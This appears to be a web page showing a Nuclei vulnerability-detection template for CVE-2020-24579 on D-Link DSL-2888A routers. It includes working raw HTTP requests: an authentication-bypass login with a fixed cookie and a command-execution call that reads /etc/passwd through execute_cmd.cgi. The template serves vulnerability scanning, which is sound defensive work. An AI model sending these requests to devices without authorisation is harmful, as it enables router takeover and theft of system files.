D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
ID: CVE-2020-24579
Severity: high
Author: pikpikcu
Tags: cve,cve2020,dlink,rce
Description
D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
YAML Source
id: CVE-2020-24579

info:
  name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
  author: pikpikcu
  severity: high
  description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the vulnerability.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24579
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-24579
    cwe-id: CWE-287
    epss-score: 0.05447
    epss-percentile: 0.93154
    cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dlink
    product: dsl2888a_firmware
  tags: cve,cve2020,dlink,rce

http:
  - raw:
      - | # Response:Location: /page/login/login_fail.html
        POST / HTTP/1.1
        Host: {{Hostname}}
        Cookie: uid=6gPjT2ipmNz

        username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
      - | # Get /etc/passwd
        GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Cookie: uid=6gPjT2ipmNz

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "nobody:[x*]:65534:65534"
          - "root:.*:0:0:"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402207ccd67bf5a3850685b6df8659070167c46e8ecbff177d078a104f4fcfa488c34022038a2da0f9e642d99804ffebf567ba1bd26501e9dde03d007e1587551b60b39d7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24579.yaml"